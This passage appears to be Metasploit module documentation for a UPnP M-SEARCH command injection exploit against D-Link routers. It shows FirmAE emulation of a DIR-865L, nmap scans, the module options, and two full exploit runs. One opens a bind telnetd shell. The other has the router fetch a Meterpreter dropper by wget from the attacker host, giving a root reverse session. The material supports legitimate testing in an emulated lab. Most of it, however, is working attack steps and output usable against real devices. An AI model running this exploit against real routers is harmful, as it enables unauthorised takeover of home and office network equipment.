* Start a debug session `./run.sh -d d-link /root/FirmAE/firmwares/DIR-865L_REVA_FIRMWARE_1.07.B01.ZIP`
* This will take a while, but in the end you should see the following...
```shell
[*] /root/FirmAE/firmwares/DIR-865L_REVA_FIRMWARE_1.07.B01.ZIP emulation start!!!
[*] extract done!!!
[*] get architecture done!!!
mke2fs 1.47.0 (5-Feb-2023)
e2fsck 1.47.0 (5-Feb-2023)
[*] infer network start!!!
[IID] 25
[MODE] debug
[+] Network reachable on 192.168.0.1!
[+] Web service on 192.168.0.1
[+] Run debug!
Creating TAP device tap25_0...
Set 'tap25_0' persistent and owned by uid 0
Initializing VLAN...
Bringing up TAP device...
Starting emulation of firmware... 192.168.0.1 true true 60.479548271 107.007791943
/root/FirmAE/./debug.py:7: DeprecationWarning: 'telnetlib' is deprecated and slated for removal in Python 3.13
import telnetlib
[*] firmware - DIR600B6_FW215WWb02
[*] IP - 192.168.0.1
[*] connecting to netcat (192.168.0.1:31337)
[+] netcat connected
------------------------------
| FirmAE Debugger |
------------------------------
1. connect to socat
2. connect to shell
3. tcpdump
4. run gdbserver
5. file transfer
6. exit
> 2
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
/ # uname -a
Linux dlinkrouter 4.1.17+ #28 Sat Oct 31 17:56:39 KST 2020 mips GNU/Linux
/ # hostname
dlinkrouter
/ #
```
* You should now be able to `ping` the network address 192.168.0.1 from your host and
* run a `nmap` command to check the services (HTTP TCP port 80 and UPNP UDP port 1900)
```shell
# ping 192.168.0.1
PING 192.168.0.1 (192.168.0.1) 56(84) bytes of data.
64 bytes from 192.168.0.1: icmp_seq=1 ttl=64 time=8.92 ms
64 bytes from 192.168.0.1: icmp_seq=2 ttl=64 time=2.38 ms
^C
--- 192.168.0.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 2.384/5.650/8.916/3.266 ms
# nmap 192.168.0.1
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-17 18:33 UTC
Nmap scan report for 192.168.0.1
Host is up (0.022s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
443/tcp open https
8181/tcp open intermapper
49152/tcp open unknown
MAC Address: 00:DE:FA:1A:01:00 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 1.25 seconds
# nmap -sU 192.168.0.1
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-17 18:34 UTC
Nmap scan report for 192.168.0.1
Host is up (0.0019s latency).
Not shown: 993 closed udp ports (port-unreach)
PORT STATE SERVICE
53/udp open domain
67/udp open|filtered dhcps
137/udp open|filtered netbios-ns
1900/udp open|filtered upnp
5353/udp open zeroconf
5355/udp open|filtered llmnr
19541/udp open|filtered jcp
MAC Address: 00:DE:FA:1A:01:00 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 1054.98 seconds
```
You are now ready to test the module using the emulated router hardware on IP address 192.168.0.1.
## Verification Steps
- [x] Start `msfconsole`
- [x] `use exploit/linux/upnp/dlink_upnp_msearch_exec`
- [x] `set rhosts <ip-target>`
- [x] `set rport 1900`
- [x] `set http_port 80`
- [x] `set lhost <ip-attacker>`
- [x] `set target <0=Unix Command, 1=Linux Dropper>`
- [x] `exploit`
you should get a `shell` or `Meterpreter`
```shell
msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > options
Module options (exploit/linux/upnp/dlink_upnp_msearch_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.0.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 1900 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
HTTP_PORT 80 yes Universal Plug and Play (UPnP) UDP port
URIPATH no The URI to use for this exploit (default is random)
URN urn:device:1 no Set URN payload
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (cmd/unix/bind_busybox_telnetd):
Name Current Setting Required Description
---- --------------- -------- -----------
LOGIN_CMD /bin/sh yes Command telnetd will execute on connect
LPORT 4444 yes The listen port
RHOST 192.168.0.1 no The target address
Exploit target:
Id Name
-- ----
0 Unix Command
View the full module info with the info, or info -d command.
```
## Options
### HTTP_PORT
Port setting where the HTTP and SOAP service is running, typically port 80.
This is used to discover the d-link hardware and version information by scraping the web or soap response.
## Scenarios
### FirmAE D-Link DIR-865L Router Emulation Unix Command - cmd/unix/bind_busybox_telnetd
```shell
msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > check
[*] Checking if 192.168.0.1:1900 can be exploited.
[*] 192.168.0.1:1900 - The target appears to be vulnerable. Product info: DIR-865L|1.07|A1|mipsle
msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > exploit
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.0.1:1900 can be exploited.
[+] The target appears to be vulnerable. Product info: DIR-865L|1.07|A1|mipsle
[*] Executing Unix Command for cmd/unix/bind_busybox_telnetd
[*] Started bind TCP handler against 192.168.0.1:4444
[*] Command shell session 1 opened (192.168.0.2:42349 -> 192.168.0.1:4444) at 2023-10-17 18:35:36 +0000
Shell Banner:
_!_
# uname -a
uname -a
Linux dlinkrouter 4.1.17+ #28 Sat Oct 31 17:56:39 KST 2020 mips GNU/Linux
# hostname
hostname
dlinkrouter
#
```
### FirmAE D-Link DIR-865L Router Emulation Linux Dropper - linux/mipsle/meterpreter_reverse_tcp
```shell
msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > set target 1
target => 1
msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > set payload linux/mipsle/meterpreter_reverse_tcp
payload => linux/mipsle/meterpreter_reverse_tcp
msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > set lhost 192.168.0.2
lhost => 192.168.0.2
msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > exploit
[*] Started reverse TCP handler on 192.168.0.2:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.0.1:1900 can be exploited.
[+] The target appears to be vulnerable. Product info: DIR-865L|1.07|A1|mipsle
[*] Executing Linux Dropper for linux/mipsle/meterpreter_reverse_tcp
[*] Using URL: http://192.168.0.2:8080/5W7O47FX
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Client 192.168.0.1 (Wget) requested /5W7O47FX
[*] Sending payload to 192.168.0.1 (Wget)
[*] Meterpreter session 2 opened (192.168.0.2:4444 -> 192.168.0.1:59600) at 2023-10-17 18:45:12 +0000
[*] Server stopped.
meterpreter > sysinfo
Computer : 192.168.0.1
OS : (Linux 4.1.17+)
Architecture : mips
BuildTuple : mipsel-linux-muslsf
Meterpreter : mipsle/linux
meterpreter > getuid
Server username: root
meterpreter >
```
## Limitations
Staged meterpreter payloads might core dump on the target, so use stage-less meterpreter payloads when using the Linux Dropper target.
Some D-Link devices do not have the `wget` command so configure `echo` as cmd-stager flavor with the command `set CMDSTAGER::FLAVOR echo`.